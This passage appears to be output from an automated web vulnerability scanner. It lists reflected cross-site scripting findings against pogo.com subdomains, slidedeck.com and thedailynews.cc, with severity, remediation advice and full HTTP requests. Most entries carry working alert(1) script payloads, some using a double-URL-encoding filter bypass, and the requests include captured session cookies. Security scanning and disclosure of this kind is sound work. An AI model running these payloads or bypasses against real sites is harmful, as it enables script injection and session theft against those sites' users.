This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the pageSection request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /hotdeploy/us/promotions/marketing/bgca/landing-page.jsp?&intcmp=fp_mtx_mb_minis_1&pageSection=free_home_mtx_shopping3c915%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4cf12ef1b83 HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
The value of the pageSection request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c79ff%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e42a5d9a0e0d was submitted in the pageSection parameter. This input was echoed as c79ff</script><script>alert(1)</script>42a5d9a0e0d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the pageSection request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /hotdeploy/us/promotions/marketing/pogoiphone/landing-page.jsp?pageSection=homnav_iphonec79ff%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e42a5d9a0e0d HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
3.616. http://www.pogo.com/prize/prize.do [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.pogo.com
Path:
/prize/prize.do
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15d82"><script>alert(1)</script>a5d2698d48f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /prize/prize.do?pageSection=footer_prize&15d82"><script>alert(1)</script>a5d2698d48f=1 HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
The value of the pageSection request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b79d%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e28f760955af was submitted in the pageSection parameter. This input was echoed as 8b79d</script><script>alert(1)</script>28f760955af in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the pageSection request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /prize/prize.do?pageSection=footer_prize8b79d%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e28f760955af HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
3.618. http://www.pogo.com/sitemap [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.pogo.com
Path:
/sitemap
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9b56"><script>alert(1)</script>c47acb8a68d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sitemap?a9b56"><script>alert(1)</script>c47acb8a68d=1 HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook. ...[SNIP]... <link rel="canonical" href="http://www.pogo.com/sitemap?a9b56"><script>alert(1)</script>c47acb8a68d=1"/> ...[SNIP]...
3.619. https://www.pogo.com/action/pogo/signin.do [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.pogo.com
Path:
/action/pogo/signin.do
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29ac9"><script>alert(1)</script>0baf35176c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /action/pogo/signin.do?pageSection=footer_login&29ac9"><script>alert(1)</script>0baf35176c0=1 HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
The value of REST URL parameter 1 is copied into an HTML comment. The payload 71eb8--><script>alert(1)</script>873957fd8a7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /download71eb8--><script>alert(1)</script>873957fd8a7 HTTP/1.1 Host: www.slidedeck.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 03:10:31 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.6 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sun, 09 Jan 2011 03:10:31 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.slidedeck.com/xmlrpc.php Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 28374
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head> <meta charset=" ...[SNIP]... <!-- This Quick Cache file was built for ( www.slidedeck.com/download71eb8--><script>alert(1)</script>873957fd8a7 ) in 0.65286 seconds, on Jan 9th, 2011 at 3:10 am UTC. --> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 5bb51--><script>alert(1)</script>578321f4700 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /usage-documentation5bb51--><script>alert(1)</script>578321f4700 HTTP/1.1 Host: www.slidedeck.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 03:09:56 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.6 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sun, 09 Jan 2011 03:09:58 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.slidedeck.com/xmlrpc.php Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 28407
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head> <meta charset=" ...[SNIP]... <!-- This Quick Cache file was built for ( www.slidedeck.com/usage-documentation5bb51--><script>alert(1)</script>578321f4700 ) in 1.84841 seconds, on Jan 9th, 2011 at 3:09 am UTC. --> ...[SNIP]...
3.622. http://www.thedailynews.cc/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.thedailynews.cc
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a39c5"><script>alert(1)</script>16e0513e3bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?a39c5"><script>alert(1)</script>16e0513e3bf=1 HTTP/1.1 Host: www.thedailynews.cc Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 09 Jan 2011 01:20:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html Expires: Sat, 08 Jan 2011 01:20:42 GMT Set-Cookie: UID=15824304; expires=Mon, 31-Dec-2012 05:00:00 GMT; path=/ Set-Cookie: ASPSESSIONIDSASAASQB=FDNAOIEABLECEOILNOBIAMFL; path=/ Cache-control: private
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e300f</script><script>alert(1)</script>d94ebed0ad1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: board-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=e300f</script><script>alert(1)</script>d94ebed0ad1
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91bb8</script><script>alert(1)</script>1a8a6141c5c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /games/monopoly HTTP/1.1 Host: board-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=91bb8</script><script>alert(1)</script>1a8a6141c5c
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f9be</script><script>alert(1)</script>b2070efcc4c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /games/online-chess HTTP/1.1 Host: board-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=5f9be</script><script>alert(1)</script>b2070efcc4c
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a90c</script><script>alert(1)</script>f1db3c1e137 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /games/risk HTTP/1.1 Host: board-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=1a90c</script><script>alert(1)</script>f1db3c1e137
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0ce5</script><script>alert(1)</script>85f9e6f8132 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: card-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=d0ce5</script><script>alert(1)</script>85f9e6f8132
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48660</script><script>alert(1)</script>7be45d0934c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /games/rainy-day-spider-solitaire HTTP/1.1 Host: card-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=48660</script><script>alert(1)</script>7be45d0934c
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f2d1</script><script>alert(1)</script>166a472ed8a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: clubpogo-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=4f2d1</script><script>alert(1)</script>166a472ed8a
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42e11</script><script>alert(1)</script>27787d232a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: flash-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=42e11</script><script>alert(1)</script>27787d232a
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24687</script><script>alert(1)</script>491924de1e5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /error/java-problem.jsp HTTP/1.1 Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e; Referer: http://www.google.com/search?hl=en&q=24687</script><script>alert(1)</script>491924de1e5
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dfd05</script><script>alert(1)</script>57005f1f7dd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
